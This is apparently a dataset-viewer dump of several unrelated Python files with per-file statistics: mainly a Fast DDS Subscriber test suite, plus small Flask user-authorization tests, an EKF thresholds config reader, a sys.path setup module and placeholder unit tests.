    reliability, which is verified on every reader created from it.
    An unknown profile name must yield no reader at all.
    """
    listener = DataReaderListener()
    assert(listener is not None)
    # Failure
    datareader = subscriber.create_datareader_with_profile(
        topic, 'no_exits_profile')
    assert(datareader is None)
    # Overload 1
    datareader = subscriber.create_datareader_with_profile(
        topic, 'test_datareader_profile')
    assert(datareader is not None)
    assert(datareader.is_enabled())
    qos = datareader.get_qos()
    assert(fastdds.RELIABLE_RELIABILITY_QOS ==
           qos.reliability().kind)
    assert(fastdds.StatusMask.all() == datareader.get_status_mask())
    assert(fastdds.ReturnCode_t.RETCODE_OK ==
           subscriber.delete_datareader(datareader))
    # Overload 2
    datareader = subscriber.create_datareader_with_profile(
        topic, 'test_datareader_profile', listener)
    assert(datareader is not None)
    assert(datareader.is_enabled())
    qos = datareader.get_qos()
    assert(fastdds.RELIABLE_RELIABILITY_QOS ==
           qos.reliability().kind)
    assert(fastdds.StatusMask.all() == datareader.get_status_mask())
    assert(fastdds.ReturnCode_t.RETCODE_OK ==
           subscriber.delete_datareader(datareader))
    def test(status_mask_1, status_mask_2, listnr=None):
        """
        Test the entity creation using the two types of StatusMasks.
        """
        datareader = subscriber.create_datareader_with_profile(
            topic, 'test_datareader_profile', listnr, status_mask_1)
        assert(datareader is not None)
        assert(datareader.is_enabled())
        qos = datareader.get_qos()
        assert(fastdds.RELIABLE_RELIABILITY_QOS ==
               qos.reliability().kind)
        assert(status_mask_1 == datareader.get_status_mask())
        assert(fastdds.ReturnCode_t.RETCODE_OK ==
               subscriber.delete_datareader(datareader))
        datareader = subscriber.create_datareader_with_profile(
            topic, 'test_datareader_profile', listnr, status_mask_2)
        assert(datareader is not None)
        assert(datareader.is_enabled())
        # Bug fix: the original re-checked the stale 'qos' of the previous
        # (already deleted) reader here; query the newly created reader.
        qos = datareader.get_qos()
        assert(fastdds.RELIABLE_RELIABILITY_QOS ==
               qos.reliability().kind)
        assert(status_mask_2 == datareader.get_status_mask())
        assert(fastdds.ReturnCode_t.RETCODE_OK ==
               subscriber.delete_datareader(datareader))
    # Overload 3: Different status masks
    test(fastdds.StatusMask.all(), fastdds.StatusMask_all(), None)
    test(fastdds.StatusMask.all(), fastdds.StatusMask_all(), listener)
    test(fastdds.StatusMask.none(), fastdds.StatusMask_none(), listener)
    test(fastdds.StatusMask.data_available(),
         fastdds.StatusMask_data_available(), listener)
    test(fastdds.StatusMask.data_on_readers(),
         fastdds.StatusMask_data_on_readers(), listener)
    test(fastdds.StatusMask.inconsistent_topic(),
         fastdds.StatusMask_inconsistent_topic(), listener)
    test(fastdds.StatusMask.liveliness_changed(),
         fastdds.StatusMask_liveliness_changed(), listener)
    test(fastdds.StatusMask.liveliness_lost(),
         fastdds.StatusMask_liveliness_lost(), listener)
    test(fastdds.StatusMask.offered_deadline_missed(),
         fastdds.StatusMask_offered_deadline_missed(), listener)
    test(fastdds.StatusMask.offered_incompatible_qos(),
         fastdds.StatusMask_offered_incompatible_qos(), listener)
    test(fastdds.StatusMask.publication_matched(),
         fastdds.StatusMask_publication_matched(), listener)
    test(fastdds.StatusMask.requested_deadline_missed(),
         fastdds.StatusMask_requested_deadline_missed(), listener)
    test(fastdds.StatusMask.requested_incompatible_qos(),
         fastdds.StatusMask_requested_incompatible_qos(), listener)
    test(fastdds.StatusMask.sample_lost(),
         fastdds.StatusMask_sample_lost(), listener)
    test(fastdds.StatusMask.sample_rejected(),
         fastdds.StatusMask_sample_rejected(), listener)
    test(fastdds.StatusMask.subscription_matched(),
         fastdds.StatusMask_subscription_matched(), listener)
    m = fastdds.StatusMask_data_available() << \
        fastdds.StatusMask_data_on_readers() << \
        fastdds.StatusMask_inconsistent_topic() << \
        fastdds.StatusMask_liveliness_changed() << \
        fastdds.StatusMask_liveliness_lost() << \
        fastdds.StatusMask_offered_deadline_missed() << \
        fastdds.StatusMask_offered_incompatible_qos() << \
        fastdds.StatusMask_publication_matched() << \
        fastdds.StatusMask_requested_deadline_missed() << \
        fastdds.StatusMask_requested_incompatible_qos() << \
        fastdds.StatusMask_sample_lost() << \
        fastdds.StatusMask_sample_rejected() << \
        fastdds.StatusMask_subscription_matched()
    test(fastdds.StatusMask.data_available() <<
         fastdds.StatusMask.data_on_readers() <<
         fastdds.StatusMask.inconsistent_topic() <<
         fastdds.StatusMask.liveliness_changed() <<
         fastdds.StatusMask.liveliness_lost() <<
         fastdds.StatusMask.offered_deadline_missed() <<
         fastdds.StatusMask.offered_incompatible_qos() <<
         fastdds.StatusMask.publication_matched() <<
         fastdds.StatusMask.requested_deadline_missed() <<
         fastdds.StatusMask.requested_incompatible_qos() <<
         fastdds.StatusMask.sample_lost() <<
         fastdds.StatusMask.sample_rejected() <<
         fastdds.StatusMask.subscription_matched(),
         m,
         listener)
def test_delete_contained_entities(participant, topic, subscriber):
    """
    This test checks:
    - Subscriber::delete_contained_entities
    """
    datareader = subscriber.create_datareader(
        topic, fastdds.DATAREADER_QOS_DEFAULT)
    assert(datareader is not None)
    # Cannot delete subscriber with datareaders
    assert(fastdds.ReturnCode_t.RETCODE_PRECONDITION_NOT_MET ==
           participant.delete_subscriber(subscriber))
    # delete_contained_entities removes the reader, leaving the subscriber
    # empty so the fixture teardown can delete it.
    assert(fastdds.ReturnCode_t.RETCODE_OK ==
           subscriber.delete_contained_entities())
    assert(subscriber.has_datareaders() is False)
def test_enable(not_autoenable_participant_qos, subscriber):
    """
    Checks Subscriber::enable and Subscriber::is_enabled.

    The participant QoS has autoenable_created_entities disabled, so the
    subscriber starts disabled and only reports enabled after an explicit
    enable() call.
    """
    assert not subscriber.is_enabled()
    ret = subscriber.enable()
    assert ret == fastdds.ReturnCode_t.RETCODE_OK
    assert subscriber.is_enabled()
def test_get_datareaders(topic, subscriber):
    """
    This test checks:
    - Subscriber::get_datareaders
    - Subscriber::has_datareaders
    """
    datareader = subscriber.create_datareader(
        topic, fastdds.DATAREADER_QOS_DEFAULT)
    assert(datareader is not None)
    assert(subscriber.has_datareaders())
    # get_datareaders fills the caller-supplied vector with the single
    # reader created above.
    datareaders = fastdds.DataReaderVector()
    assert(subscriber.get_datareaders(datareaders))
    assert(1 == len(datareaders))
    assert(datareader == datareaders[0])
    assert(fastdds.ReturnCode_t.RETCODE_OK ==
           subscriber.delete_datareader(datareader))
def test_get_instance_handle(participant, subscriber):
    """
    This test checks:
    - Subscriber::get_instance_handle
    - Subscriber::guid
    """
    ih = subscriber.get_instance_handle()
    assert(ih is not None)
    assert(ih.isDefined())
    guid = participant.guid()
    assert(guid is not None)
    # Neither handle nor guid may be the "unknown" sentinel.
    assert(ih != fastdds.c_InstanceHandle_Unknown)
    assert(guid != fastdds.c_Guid_Unknown)
    # The first 12 bytes of the instance handle carry the participant's
    # GUID prefix.
    for i in range(0, 12):
        assert(guid.guidPrefix.value[i] == ih.value[i])
def test_get_participant(participant, subscriber):
    """
    Checks Subscriber::get_participant: the subscriber must report the
    participant that created it.
    """
    owner = subscriber.get_participant()
    assert owner is not None
    assert owner == participant
def test_get_set_qos(subscriber):
    """
    This test checks:
    - Subscriber::get_qos
    - Subscriber::set_qos
    """
    qos = fastdds.SubscriberQos()
    qos.partition().push_back('PartitionTest')
    qos.partition().push_back('PartitionTest2')
    assert(fastdds.ReturnCode_t.RETCODE_OK ==
           subscriber.set_qos(qos))
    qos2 = fastdds.SubscriberQos()
    assert(fastdds.ReturnCode_t.RETCODE_OK ==
           subscriber.get_qos(qos2))
    # NOTE(review): only return codes are checked; qos2 is never compared
    # against the partitions set above - consider asserting the
    # round-tripped values as well.
def test_get_set_listener(subscriber):
    """
    This test checks:
    - Subscriber::get_listener
    - Subscriber::set_listener
    - Subscriber::get_status_mask
    - StatusMask::operator ==
    - StatusMask::operator <<

    (The previous docstring said Publisher::*, but every call below is made
    on the subscriber.)
    """
    # Overload 1
    listener = SubscriberListener()
    assert(listener is not None)
    assert(fastdds.ReturnCode_t.RETCODE_OK ==
           subscriber.set_listener(listener))
    assert(subscriber.get_listener() == listener)
    # set_listener without a mask leaves the subscriber listening to all().
    assert(fastdds.StatusMask.all() == subscriber.get_status_mask())
    def test(status_mask_1, status_mask_2):
        """
        Test the entity creation using the two types of StatusMasks.

        Installs a fresh listener per mask spelling and checks the mask is
        echoed back exactly.
        """
        listener = SubscriberListener()
        assert(listener is not None)
        assert(fastdds.ReturnCode_t.RETCODE_OK ==
               subscriber.set_listener(listener, status_mask_1))
        assert(subscriber.get_listener() == listener)
        assert(status_mask_1 == subscriber.get_status_mask())
        listener = SubscriberListener()
        assert(listener is not None)
        assert(fastdds.ReturnCode_t.RETCODE_OK ==
               subscriber.set_listener(listener, status_mask_2))
        assert(subscriber.get_listener() == listener)
        assert(status_mask_2 == subscriber.get_status_mask())
    # Overload 2: Different status masks
    test(fastdds.StatusMask.all(), fastdds.StatusMask_all())
    test(fastdds.StatusMask.all(), fastdds.StatusMask_all())
    test(fastdds.StatusMask.none(), fastdds.StatusMask_none())
    test(fastdds.StatusMask.data_available(),
         fastdds.StatusMask_data_available())
    test(fastdds.StatusMask.data_on_readers(),
         fastdds.StatusMask_data_on_readers())
    test(fastdds.StatusMask.inconsistent_topic(),
         fastdds.StatusMask_inconsistent_topic())
    test(fastdds.StatusMask.liveliness_changed(),
         fastdds.StatusMask_liveliness_changed())
    test(fastdds.StatusMask.liveliness_lost(),
         fastdds.StatusMask_liveliness_lost())
    test(fastdds.StatusMask.offered_deadline_missed(),
         fastdds.StatusMask_offered_deadline_missed())
    test(fastdds.StatusMask.offered_incompatible_qos(),
         fastdds.StatusMask_offered_incompatible_qos())
    test(fastdds.StatusMask.publication_matched(),
         fastdds.StatusMask_publication_matched())
    test(fastdds.StatusMask.requested_deadline_missed(),
         fastdds.StatusMask_requested_deadline_missed())
    test(fastdds.StatusMask.requested_incompatible_qos(),
         fastdds.StatusMask_requested_incompatible_qos())
    test(fastdds.StatusMask.sample_lost(),
         fastdds.StatusMask_sample_lost())
    test(fastdds.StatusMask.sample_rejected(),
         fastdds.StatusMask_sample_rejected())
    test(fastdds.StatusMask.subscription_matched(),
         fastdds.StatusMask_subscription_matched())
    # Composite mask combined with operator << (free-function spelling)...
    m = fastdds.StatusMask_data_available() << \
        fastdds.StatusMask_data_on_readers() << \
        fastdds.StatusMask_inconsistent_topic() << \
        fastdds.StatusMask_liveliness_changed() << \
        fastdds.StatusMask_liveliness_lost() << \
        fastdds.StatusMask_offered_deadline_missed() << \
        fastdds.StatusMask_offered_incompatible_qos() << \
        fastdds.StatusMask_publication_matched() << \
        fastdds.StatusMask_requested_deadline_missed() << \
        fastdds.StatusMask_requested_incompatible_qos() << \
        fastdds.StatusMask_sample_lost() << \
        fastdds.StatusMask_sample_rejected() << \
        fastdds.StatusMask_subscription_matched()
    # ...checked against the same chain built from the static methods.
    test(fastdds.StatusMask.data_available() <<
         fastdds.StatusMask.data_on_readers() <<
         fastdds.StatusMask.inconsistent_topic() <<
         fastdds.StatusMask.liveliness_changed() <<
         fastdds.StatusMask.liveliness_lost() <<
         fastdds.StatusMask.offered_deadline_missed() <<
         fastdds.StatusMask.offered_incompatible_qos() <<
         fastdds.StatusMask.publication_matched() <<
         fastdds.StatusMask.requested_deadline_missed() <<
         fastdds.StatusMask.requested_incompatible_qos() <<
         fastdds.StatusMask.sample_lost() <<
         fastdds.StatusMask.sample_rejected() <<
         fastdds.StatusMask.subscription_matched(),
         m)
def test_lookup_datareader(topic, subscriber):
    """
    Checks Subscriber::lookup_datareader: looking a reader up by its topic
    name returns the reader created on that topic.
    """
    created = subscriber.create_datareader(
        topic, fastdds.DATAREADER_QOS_DEFAULT)
    assert created is not None
    found = subscriber.lookup_datareader('Complete')
    assert found is not None
    assert created == found
    assert subscriber.delete_datareader(created) == \
        fastdds.ReturnCode_t.RETCODE_OK
def test_listener_ownership(participant, writer_participant, topic,
                            writer_topic, publisher):
    """
    Creates a subscriber whose listener only ever existed inside a nested
    helper, so the Python reference dies as soon as the helper returns.
    Presumably this guards against the binding garbage-collecting the
    listener while the subscriber still uses it (name says "ownership");
    the test passes if the full matched read/write setup tears down
    cleanly. TODO confirm against the binding's listener lifetime rules.
    """
    def create_subcriber():
        # NOTE: 'subcriber' is a typo for 'subscriber'; kept as-is here.
        listener = SubscriberListener()
        return participant.create_subscriber(
            fastdds.SUBSCRIBER_QOS_DEFAULT, listener)
    subscriber = create_subcriber()
    datareader = subscriber.create_datareader(
        topic, fastdds.DATAREADER_QOS_DEFAULT)
    datawriter = publisher.create_datawriter(
        writer_topic, fastdds.DATAWRITER_QOS_DEFAULT)
    # Give discovery time to match reader and writer.
    time.sleep(1)
    factory = fastdds.DomainParticipantFactory.get_instance()
    # Tear down both sides child-first; every deletion must succeed.
    assert(fastdds.ReturnCode_t.RETCODE_OK ==
           publisher.delete_datawriter(datawriter))
    assert(fastdds.ReturnCode_t.RETCODE_OK ==
           writer_participant.delete_topic(writer_topic))
    assert(fastdds.ReturnCode_t.RETCODE_OK ==
           writer_participant.delete_publisher(publisher))
    assert(fastdds.ReturnCode_t.RETCODE_OK ==
           factory.delete_participant(writer_participant))
    assert(fastdds.ReturnCode_t.RETCODE_OK ==
           subscriber.delete_datareader(datareader))
    assert(fastdds.ReturnCode_t.RETCODE_OK ==
           participant.delete_topic(topic))
    assert(fastdds.ReturnCode_t.RETCODE_OK ==
           participant.delete_subscriber(subscriber))
    assert(fastdds.ReturnCode_t.RETCODE_OK ==
           factory.delete_participant(participant))
| 38.778947
| 77
| 0.710007
| 2,209
| 22,104
| 6.792666
| 0.065188
| 0.202799
| 0.071376
| 0.049583
| 0.841053
| 0.817394
| 0.804132
| 0.763745
| 0.750883
| 0.695768
| 0
| 0.002404
| 0.190689
| 22,104
| 569
| 78
| 38.8471
| 0.83638
| 0.060849
| 0
| 0.711538
| 0
| 0
| 0.007791
| 0.004508
| 0
| 0
| 0
| 0
| 0.21875
| 1
| 0.064904
| false
| 0
| 0.009615
| 0.007212
| 0.100962
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
449e68ac90a50f51637af54797823be1062b5759
| 214
|
py
|
Python
|
app/__init__.py
|
jumbobumbo/mr_roboto
|
12ed7b99d0831313f5ec6cc47f9b2a41f936b6a5
|
[
"BSD-2-Clause"
] | null | null | null |
app/__init__.py
|
jumbobumbo/mr_roboto
|
12ed7b99d0831313f5ec6cc47f9b2a41f936b6a5
|
[
"BSD-2-Clause"
] | null | null | null |
app/__init__.py
|
jumbobumbo/mr_roboto
|
12ed7b99d0831313f5ec6cc47f9b2a41f936b6a5
|
[
"BSD-2-Clause"
] | null | null | null |
import sys
import os

# Absolute directory containing this package.  The previous code appended
# os.path.join(__file__) - the file itself, not a directory - and then
# joined __file__ with the absolute components "/common" and "/scripts",
# which os.path.join resolves to the filesystem root ("/common"), so none
# of the intended directories ever became importable.
_APP_DIR = os.path.dirname(os.path.abspath(__file__))

sys.path.append(_APP_DIR)
sys.path.append(os.path.join(_APP_DIR, "common"))
sys.path.append(os.path.join(_APP_DIR, "scripts"))
| 42.8
| 68
| 0.757009
| 36
| 214
| 4.166667
| 0.277778
| 0.24
| 0.26
| 0.3
| 0.8
| 0.8
| 0.8
| 0.8
| 0.8
| 0.8
| 0
| 0
| 0.037383
| 214
| 5
| 68
| 42.8
| 0.728155
| 0
| 0
| 0
| 0
| 0
| 0.069767
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.4
| 0
| 0.4
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 11
|
44b5d138cb8c15e10b937b9264327f6771aec9f1
| 3,303
|
py
|
Python
|
tests/modules/users/resources/test_getting_users_info.py
|
IsmaelJS/test-github-actions
|
97223df261e9736c46875f590c9593dbac0d417b
|
[
"MIT"
] | 1,420
|
2015-11-20T01:25:14.000Z
|
2022-03-22T03:51:33.000Z
|
tests/modules/users/resources/test_getting_users_info.py
|
IsmaelJS/test-github-actions
|
97223df261e9736c46875f590c9593dbac0d417b
|
[
"MIT"
] | 151
|
2016-01-07T09:11:42.000Z
|
2020-11-17T08:37:07.000Z
|
tests/modules/users/resources/test_getting_users_info.py
|
IsmaelJS/test-github-actions
|
97223df261e9736c46875f590c9593dbac0d417b
|
[
"MIT"
] | 389
|
2015-11-23T01:14:31.000Z
|
2022-02-07T08:23:11.000Z
|
# encoding: utf-8
# pylint: disable=missing-docstring
import pytest
@pytest.mark.parametrize('auth_scopes', (
    ('users:write', ),
    ('users:read', ),
    ('users:read', 'users:write', ),
))
def test_getting_list_of_users_by_unauthorized_user_must_fail(
        flask_app_client,
        regular_user,
        auth_scopes
):
    """A regular (non-admin) user listing /api/v1/users/ must be rejected
    with a JSON error body."""
    # pylint: disable=invalid-name
    with flask_app_client.login(regular_user, auth_scopes=auth_scopes):
        response = flask_app_client.get('/api/v1/users/')
    if 'users:read' in auth_scopes:
        # Read scope present but user lacks privileges -> Forbidden.
        assert response.status_code == 403
    else:
        # Token carries no read scope at all -> Unauthorized.
        assert response.status_code == 401
    assert response.content_type == 'application/json'
    assert set(response.json.keys()) >= {'status', 'message'}
@pytest.mark.parametrize('auth_scopes', (
    ('users:read', ),
    ('users:read', 'users:write', ),
))
def test_getting_list_of_users_by_authorized_user(flask_app_client, admin_user, auth_scopes):
    """An admin with the 'users:read' scope gets the user list as a JSON array."""
    # pylint: disable=invalid-name
    with flask_app_client.login(admin_user, auth_scopes=auth_scopes):
        response = flask_app_client.get('/api/v1/users/')
    assert response.status_code == 200
    assert response.content_type == 'application/json'
    assert isinstance(response.json, list)
    # Each entry exposes at least the public identification fields.
    assert set(response.json[0].keys()) >= {'id', 'username'}
def test_getting_user_info_by_unauthorized_user(flask_app_client, regular_user, admin_user):
    # pylint: disable=invalid-name
    """A regular user requesting another user's record gets 403 with a JSON
    error body."""
    with flask_app_client.login(regular_user, auth_scopes=('users:read',)):
        resp = flask_app_client.get('/api/v1/users/%d' % admin_user.id)
    assert resp.status_code == 403
    assert resp.content_type == 'application/json'
    assert isinstance(resp.json, dict)
    assert {'status', 'message'} <= set(resp.json.keys())
def test_getting_user_info_by_authorized_user(flask_app_client, regular_user, admin_user):
    """An admin may read another user's record; the password must never be
    serialized."""
    # pylint: disable=invalid-name
    with flask_app_client.login(admin_user, auth_scopes=('users:read',)):
        response = flask_app_client.get('/api/v1/users/%d' % regular_user.id)
    assert response.status_code == 200
    assert response.content_type == 'application/json'
    assert isinstance(response.json, dict)
    assert set(response.json.keys()) >= {'id', 'username'}
    # The user schema must never leak the password field.
    assert 'password' not in response.json.keys()
def test_getting_user_info_by_owner(flask_app_client, regular_user):
    # pylint: disable=invalid-name
    """A user may read their own record; the password field is never exposed."""
    with flask_app_client.login(regular_user, auth_scopes=('users:read',)):
        resp = flask_app_client.get('/api/v1/users/%d' % regular_user.id)
    assert resp.status_code == 200
    assert resp.content_type == 'application/json'
    assert isinstance(resp.json, dict)
    assert {'id', 'username'} <= set(resp.json.keys())
    assert 'password' not in resp.json.keys()
def test_getting_user_me_info(flask_app_client, regular_user):
    """/api/v1/users/me returns the logged-in user's own record without the
    password."""
    # pylint: disable=invalid-name
    with flask_app_client.login(regular_user, auth_scopes=('users:read',)):
        response = flask_app_client.get('/api/v1/users/me')
    assert response.status_code == 200
    assert response.content_type == 'application/json'
    assert isinstance(response.json, dict)
    assert set(response.json.keys()) >= {'id', 'username'}
    # The user schema must never leak the password field.
    assert 'password' not in response.json.keys()
| 39.795181
| 93
| 0.713291
| 438
| 3,303
| 5.114155
| 0.152968
| 0.064286
| 0.1125
| 0.075
| 0.905804
| 0.883036
| 0.798661
| 0.758036
| 0.758036
| 0.758036
| 0
| 0.010361
| 0.152589
| 3,303
| 82
| 94
| 40.280488
| 0.789925
| 0.067514
| 0
| 0.639344
| 0
| 0
| 0.13774
| 0
| 0
| 0
| 0
| 0
| 0.442623
| 1
| 0.098361
| false
| 0.04918
| 0.016393
| 0
| 0.114754
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
44fce63a84824f8aba9c47077e0af0ff01d1d4bf
| 2,268
|
py
|
Python
|
src/ecl_ekf_analysis/config/thresholds.py
|
JohannesBrand/ecl_ekf_analysis
|
9d0f3875767f94c5a37a676161e42b2e14589e8f
|
[
"BSD-3-Clause"
] | null | null | null |
src/ecl_ekf_analysis/config/thresholds.py
|
JohannesBrand/ecl_ekf_analysis
|
9d0f3875767f94c5a37a676161e42b2e14589e8f
|
[
"BSD-3-Clause"
] | null | null | null |
src/ecl_ekf_analysis/config/thresholds.py
|
JohannesBrand/ecl_ekf_analysis
|
9d0f3875767f94c5a37a676161e42b2e14589e8f
|
[
"BSD-3-Clause"
] | null | null | null |
#! /usr/bin/env python3
"""
returns thresholds
"""
#pylint
import os
import configparser
_thresholds = configparser.ConfigParser()
_thresholds.read([os.path.join(os.path.dirname(__file__), 'thresholds.ini')])
def _default_float(option: str) -> float:
    """Read *option* from the [DEFAULT] section of thresholds.ini as a float.

    Shared helper: every public accessor below is a thin wrapper so the
    section name and the getfloat call live in exactly one place.
    """
    return _thresholds.getfloat('DEFAULT', option)
def ecl_innovation_failure_pct(innovation_name: str) -> float:
    """Failure threshold (percent) for the named innovation check."""
    return _default_float('{:s}_innovation_failure_pct'.format(innovation_name))
def ecl_amber_warning_pct(innovation_name: str) -> float:
    """Amber warning threshold (percent) for the named innovation check."""
    return _default_float('{:s}_amber_warning_pct'.format(innovation_name))
def ecl_amber_failure_pct(innovation_name: str) -> float:
    """Amber failure threshold (percent) for the named innovation check."""
    return _default_float('{:s}_amber_failure_pct'.format(innovation_name))
def ecl_filter_fault_flag_failure() -> float:
    """Failure threshold for the EKF filter fault flag."""
    return _default_float('filter_fault_flag_failure')
def imu_coning_warning_max() -> float:
    """Warning threshold for the maximum IMU coning metric."""
    return _default_float('imu_coning_warning_max')
def imu_coning_warning_avg() -> float:
    """Warning threshold for the average IMU coning metric."""
    return _default_float('imu_coning_warning_avg')
def imu_high_freq_delta_angle_warning_max() -> float:
    """Warning threshold for the maximum high-frequency delta-angle metric."""
    return _default_float('imu_high_freq_delta_angle_warning_max')
def imu_high_freq_delta_angle_warning_avg() -> float:
    """Warning threshold for the average high-frequency delta-angle metric."""
    return _default_float('imu_high_freq_delta_angle_warning_avg')
def imu_high_freq_delta_velocity_warning_max() -> float:
    """Warning threshold for the maximum high-frequency delta-velocity metric."""
    return _default_float('imu_high_freq_delta_velocity_warning_max')
def imu_high_freq_delta_velocity_warning_avg() -> float:
    """Warning threshold for the average high-frequency delta-velocity metric."""
    return _default_float('imu_high_freq_delta_velocity_warning_avg')
def imu_observed_angle_error_warning_avg() -> float:
    """Warning threshold for the average observed angle error."""
    return _default_float('imu_observed_angle_error_warning_avg')
def imu_observed_velocity_error_warning_avg() -> float:
    """Warning threshold for the average observed velocity error."""
    return _default_float('imu_observed_velocity_error_warning_avg')
def imu_observed_position_error_warning_avg() -> float:
    """Warning threshold for the average observed position error."""
    return _default_float('imu_observed_position_error_warning_avg')
def imu_delta_angle_bias_warning_avg() -> float:
    """Warning threshold for the average delta-angle bias estimate."""
    return _default_float('imu_delta_angle_bias_warning_avg')
def imu_delta_velocity_bias_warning_avg() -> float:
    """Warning threshold for the average delta-velocity bias estimate."""
    return _default_float('imu_delta_velocity_bias_warning_avg')
| 40.5
| 97
| 0.801587
| 298
| 2,268
| 5.557047
| 0.157718
| 0.096618
| 0.190217
| 0.262681
| 0.84058
| 0.813406
| 0.695048
| 0.557367
| 0.482488
| 0.482488
| 0
| 0.000484
| 0.088624
| 2,268
| 56
| 98
| 40.5
| 0.800677
| 0.020723
| 0
| 0
| 0
| 0
| 0.268414
| 0.214641
| 0
| 0
| 0
| 0
| 0
| 1
| 0.441176
| false
| 0
| 0.058824
| 0.441176
| 0.941176
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
78800fbe7849e9a854faf3c5e960f64745a58b26
| 534
|
py
|
Python
|
pitch/test_user.py
|
mukhtarabdirahman/Pitch
|
291463c3bc6d4d2083c2f20b5b3a47e320d8c18b
|
[
"Unlicense"
] | null | null | null |
pitch/test_user.py
|
mukhtarabdirahman/Pitch
|
291463c3bc6d4d2083c2f20b5b3a47e320d8c18b
|
[
"Unlicense"
] | 1
|
2021-06-08T20:49:10.000Z
|
2021-06-08T20:49:10.000Z
|
pitch/test_user.py
|
mukhtarabdirahman/Pitch
|
291463c3bc6d4d2083c2f20b5b3a47e320d8c18b
|
[
"Unlicense"
] | 1
|
2020-07-23T21:58:03.000Z
|
2020-07-23T21:58:03.000Z
|
import unittest
from models import User, Post, Comment


class TestUser(unittest.TestCase):
    """Placeholder tests for the User model."""

    # NOTE(review): setUp builds Post and Comment instances, not a User -
    # this looks copy-pasted from TestPost; confirm against the models
    # module before adding real assertions.
    def setUp(self):
        self.new_post = Post()
        # Bug fix: Comment was used here but never imported, which raised
        # NameError as soon as any test ran; it is now imported above.
        self.new_comment = Comment()

    def test_user_instance(self):
        pass

    def test_post_instance(self):
        pass


class TestPost(unittest.TestCase):
    """Placeholder tests for the Post model."""

    def setUp(self):
        self.new_post = Post()
        self.new_comment = Comment()

    def test_user_instance(self):
        pass

    def test_post_instance(self):
        pass


if __name__ == '__main__':
    unittest.main()
| 23.217391
| 36
| 0.640449
| 66
| 534
| 4.878788
| 0.318182
| 0.086957
| 0.198758
| 0.149068
| 0.732919
| 0.732919
| 0.732919
| 0.732919
| 0.732919
| 0.732919
| 0
| 0
| 0.264045
| 534
| 23
| 37
| 23.217391
| 0.819338
| 0
| 0
| 0.7
| 0
| 0
| 0.014953
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.3
| false
| 0.2
| 0.1
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.